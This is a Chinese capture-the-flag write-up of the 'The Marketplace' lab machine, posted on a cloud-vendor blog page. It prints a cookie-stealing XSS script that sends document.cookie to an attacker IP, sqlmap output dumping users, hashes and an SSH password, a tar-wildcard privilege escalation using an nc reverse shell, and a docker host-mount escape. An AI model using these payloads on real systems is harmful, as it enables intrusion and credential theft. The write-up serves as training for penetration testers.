【靶机】xss盗取cookie-sqlmap进阶-通配符提权-docker逃逸-The Marketplace

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS PostgreSQL,集群系列 2核4GB
简介: 靶机难度中等,对小白不太友好,建议边打边看,学习一下思路。

前言

bilibili:Zacarx

www.zacarx.com

nmap

┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.96.223
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:22 CST
Nmap scan report for 10.10.96.223 (10.10.96.223)
Host is up (0.27s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp    open  http    nginx 1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-server-header: nginx/1.19.2
32768/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds

目录扫描

──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.198.229                                                             

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Oct 25 22:42:22 2022
URL_BASE: http://10.10.198.229/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.198.229/ ----
+ http://10.10.198.229/admin (CODE:403|SIZE:392)                                                               
+ http://10.10.198.229/Admin (CODE:403|SIZE:392)                                                               
+ http://10.10.198.229/ADMIN (CODE:403|SIZE:392)                                                               
> Testing: http://10.10.198.229/hidden                       

xss利用

nc -lnvp 4444

记得先进行监听后进行report

sqlmap进阶用法

┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:55:39 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:55:46] [INFO] testing connection to the target URL
[20:55:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:55:50] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:55:52] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:56:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:56:06] [WARNING] reflective value(s) found and filtering out
[20:56:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:56:14] [INFO] target URL appears to have 4 columns in query
[20:56:25] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[20:56:25] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:56:40] [INFO] testing MySQL
[20:56:41] [INFO] confirming MySQL
[20:56:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, Express
back-end DBMS: MySQL >= 8.0.0
[20:56:51] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] marketplace

[20:56:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 10 times
[20:56:52] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'

[*] ending @ 20:56:52 /2022-10-25/

                                                                                                                                        
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump 
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:14 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] y
[20:57:17] [INFO] resuming back-end DBMS 'mysql' 
[20:57:17] [INFO] testing connection to the target URL
[20:57:18] [CRITICAL] anti-CSRF token 'token' can't be found at 'http://10.10.96.223:80/admin?user=1'. You can try to rerun by providing a valid value for option '--csrf-url'

[*] ending @ 20:57:18 /2022-10-25/

                                                                                                                                        
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:21 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:57:24] [INFO] resuming back-end DBMS 'mysql' 
[20:57:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:57:25] [INFO] the back-end DBMS is MySQL
web application technology: Express, Nginx 1.19.2
back-end DBMS: MySQL 8
[20:57:25] [INFO] fetching tables for database: 'marketplace'
[20:57:26] [INFO] fetching columns for table 'items' in database 'marketplace'
[20:57:28] [INFO] fetching entries for table 'items' in database 'marketplace'
[20:57:29] [INFO] recognized possible password hashes in column 'image'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:57:39] [INFO] writing hashes to a temporary file '/tmp/sqlmaplnctc6c13775/sqlmaphashes-ft657rdv.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:57:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:57:53] [INFO] starting 4 processes 
[20:58:03] [WARNING] no clear password(s) found                                                                                        
Database: marketplace
Table: items
[7 entries]
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| id | image                            | title       | author | description                                                         |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| 1  | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2      | Good as new.                                                        |
| 2  | abffe546fb4cb740cc6b44f9e4c263df | A cactus    | 3      | Yep, that's a cactus.                                               |
| 3  | 598815c0f5554115631a3250e5db1719 | a           | 4      | axxxxx                                                              |
| 4  | 598815c0f5554115631a3250e5db1719 | a           | 4      | <script> alert(1) </script>                                         |
| 5  | 598815c0f5554115631a3250e5db1719 | a           | 4      | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script>   |
| 6  | 598815c0f5554115631a3250e5db1719 | av          | 4      | <script>fetch("http://10.10.96.223:4444/"+document.cookie)</script> |
| 7  | 598815c0f5554115631a3250e5db1719 | asa         | 4      | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script>   |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+

[20:58:03] [INFO] table 'marketplace.items' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/items.csv'
[20:58:03] [INFO] fetching columns for table 'messages' in database 'marketplace'
[20:58:05] [INFO] fetching entries for table 'messages' in database 'marketplace'
Database: marketplace
Table: messages
[11 entries]
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | is_read | user_to | user_from | message_content                                                                                                                                                                                   |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | 1       | 3       | 1         | Hello!\r\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\r\nYour new password is: @b_ENXkGYUCAv3zJ     |
| 2  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 3  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 4  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 5  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 6  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 7  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 8  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 9  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 10 | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 11 | 0       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[20:58:06] [INFO] table 'marketplace.messages' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/messages.csv'
[20:58:06] [INFO] fetching columns for table 'users' in database 'marketplace'
[20:58:07] [INFO] fetching entries for table 'users' in database 'marketplace'
Database: marketplace
Table: users
[4 entries]
+----+--------------------------------------------------------------+----------+-----------------+
| id | password                                                     | username | isAdministrator |
+----+--------------------------------------------------------------+----------+-----------------+
| 1  | $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW | system   | 0               |
| 2  | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q | michael  | 1               |
| 3  | $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake     | 1               |
| 4  | $2b$10$eWi7EwPf1euh6kC4AUM4iur1VWx4ZYG5EUUebOEO6cMVUUZTGYmsG | Zacarx   | 0               |
+----+--------------------------------------------------------------+----------+-----------------+

[20:58:09] [INFO] table 'marketplace.users' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/users.csv'
[20:58:09] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'

[*] ending @ 20:58:09 /2022-10-25/

我们得知ssh密码 @b_ENXkGYUCAv3zJ,用户为system,maichael,jake其中的一个人

所以非常简单地我们就得到了一个shell

提权

通配符提权 - PENETRATION NOTE (heresecurity.wiki)

echo "mkfifo /tmp/lhennp; nc 10.17.0.91 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh



echo "" > "--checkpoint-action=exec=sh shell.sh"



echo "" > --checkpoint=1

sudo -u michael ./shell.sh

docker逃逸

docker | GTFOBins

This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root.

Any other Docker Linux image should work, e.g., debian.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
7月前
|
应用服务中间件 Shell nginx
Docker进阶:深入了解 Dockerfile
Dockerfile 是定义 Docker 镜像内容和构建步骤的文本文件,用于定制化镜像构建,包括基础镜像选择、软件安装和环境变量设置等。其优点在于支持容器化趋势,简化快速部署和交付,保证环境一致性,实现资源隔离和安全性,以及促进持续集成与持续部署。Dockerfile 指令如 FROM(指定基础镜像)、RUN(执行命令)、CMD(容器启动命令)和 EXPOSE(声明端口)。编写规则包括使用大写指令、创建 .dockerignore 文件排除无关文件等。
183 0
|
存储 关系型数据库 MySQL
Docker(五)进阶:Docker卷(volumes)
数据卷:设计用来持久化数据的,它的生命周期独立于容器,不会因为容器被删除后自动删除,并且也不存在垃圾回收这样的机制来处理没有任何容器引用的 数据卷。
982 0
Docker(五)进阶:Docker卷(volumes)
|
7月前
|
Docker 容器
【Docker】掌握 Docker 镜像操作:从基础到进阶
【Docker】掌握 Docker 镜像操作:从基础到进阶
|
2月前
|
安全 Cloud Native Shell
云上攻防:云原生篇&Docker容器逃逸
本文介绍了Docker的基本概念及其对渗透测试的影响,重点讲解了容器逃逸的方法。Docker是一种轻量级的容器技术,与虚拟机相比,具有更高的便携性和资源利用率。然而,这也带来了安全风险,特别是容器逃逸问题。文章详细描述了三种常见的容器逃逸方法:不安全的配置、相关程序漏洞和内核漏洞,并提供了具体的检测和利用方法。此外,还介绍了几种特定的漏洞(如CVE-2019-5736和CVE-2020-15257)及其复现步骤,帮助读者更好地理解和应对这些安全威胁。
138 0
云上攻防:云原生篇&Docker容器逃逸
|
4月前
|
存储 安全 JavaScript
|
5月前
|
SQL 安全 Go
SQL注入不可怕,XSS也不难防!Python Web安全进阶教程,让你安心做开发!
【7月更文挑战第26天】在 Web 开发中, SQL 注入与 XSS 攻击常令人担忧, 但掌握正确防御策略可化解风险. 对抗 SQL 注入的核心是避免直接拼接用户输入至 SQL 语句. 使用 Python 的参数化查询 (如 sqlite3 库) 和 ORM 框架 (如 Django, SQLAlchemy) 可有效防范. 防范 XSS 攻击需严格过滤及转义用户输入. 利用 Django 模板引擎自动转义功能, 或手动转义及设置内容安全策略 (CSP) 来增强防护. 掌握这些技巧, 让你在 Python Web 开发中更加安心. 安全是个持续学习的过程, 不断提升才能有效保护应用.
59 1
|
6月前
|
Cloud Native 安全 Docker
云上攻防-云原生篇&Docker安全&系统内核&版本&CDK自动利用&容器逃逸
云上攻防-云原生篇&Docker安全&系统内核&版本&CDK自动利用&容器逃逸
130 5
|
7月前
|
关系型数据库 MySQL 应用服务中间件
docker的使用与进阶
docker的使用与进阶
130 0
H8
|
安全 网络协议 Shell
Docker 枚举、特权升级和容器逃逸 (DEEPCE)
为了使其与最大数量的容器兼容,DEEPCE 是纯编写的sh,没有依赖性。如果可用,它将使用其他工具,例如 curl、nmap、nslookup 和 dig,但在大多数情况下不依赖于它们进行枚举。 枚举都不应该触及磁盘,但是大多数漏洞利用会创建新的容器,这将导致磁盘写入,并且一些漏洞利用会覆盖 runC,这可能具有破坏性,所以要小心!
H8
199 0
|
存储 Ubuntu Linux
Docker(四)进阶:Docker镜像概述和分层原理
镜像是一个只读模板,带有创建Docker容器的说明。通常,一个镜像基于另一个镜像,并带有一些额外的定制。例如,您可以构建一个基于ubuntu镜像的镜像,但是要安装Apache web服务器和您的应用程序,以及运行应用程序所需的配置细节。
1301 0
Docker(四)进阶:Docker镜像概述和分层原理
下一篇
DataWorks